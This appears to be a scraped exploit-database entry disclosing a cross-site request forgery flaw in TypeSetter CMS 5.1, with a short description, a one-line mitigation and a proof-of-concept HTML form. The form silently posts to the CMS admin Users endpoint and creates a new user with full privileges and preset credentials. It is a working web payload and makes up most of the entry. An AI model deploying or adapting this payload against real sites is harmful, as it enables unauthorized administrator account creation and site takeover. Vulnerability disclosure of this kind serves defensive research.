6635886cc0
5 changes to exploits/shellcodes CloudMe Sync < 1.11.0 - Buffer Overflow Advantech WebAccess 8.3.0 - Remote Code Execution TypeSetter CMS 5.1 - 'Host' Header Injection TypeSetter CMS 5.1 - Cross-Site Request Forgery News Website Script 2.0.4 - 'search' SQL Injection
40 lines
No EOL
1.5 KiB
HTML
40 lines
No EOL
1.5 KiB
HTML
# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery
|
||
# Date: 10-02-2018
|
||
# Exploit Author: Navina Asrani
|
||
# Contact: https://twitter.com/NavinaSanjay
|
||
# Website: https://securitywarrior9.blogspot.in/
|
||
# Vendor Homepage: https://www.typesettercms.com/
|
||
# Version: 5.1
|
||
# CVE : NA
|
||
# Category: Webapp CMS
|
||
|
||
1. Description
|
||
|
||
The application allows malcious HTTP requests to be directly executed without any hidden security token.This may lead to user account takeover or malious command execution
|
||
|
||
2. Proof of Concept
|
||
|
||
Exploit code:
|
||
|
||
<html>
|
||
<body>
|
||
<form action="http://localhost/cms/Admin/Users" method="POST">
|
||
<input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />
|
||
<input type="hidden" name="username" value="samrat_test" />
|
||
<input type="hidden" name="password" value="sam9318" />
|
||
<input type="hidden" name="password1" value="sam9318" />
|
||
<input type="hidden" name="algo" value="password_hash" />
|
||
<input type="hidden" name="email" value="sam9318@gmail.com" />
|
||
<input type="hidden" name="grant_all" value="all" />
|
||
<input type="hidden" name="cmd" value="newuser" />
|
||
<input type="hidden" name="aaa" value="Save" />
|
||
<input type="submit" value="Submit request" />
|
||
</form>
|
||
</body>
|
||
</html>
|
||
|
||
|
||
|
||
3. Solution:
|
||
|
||
To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens |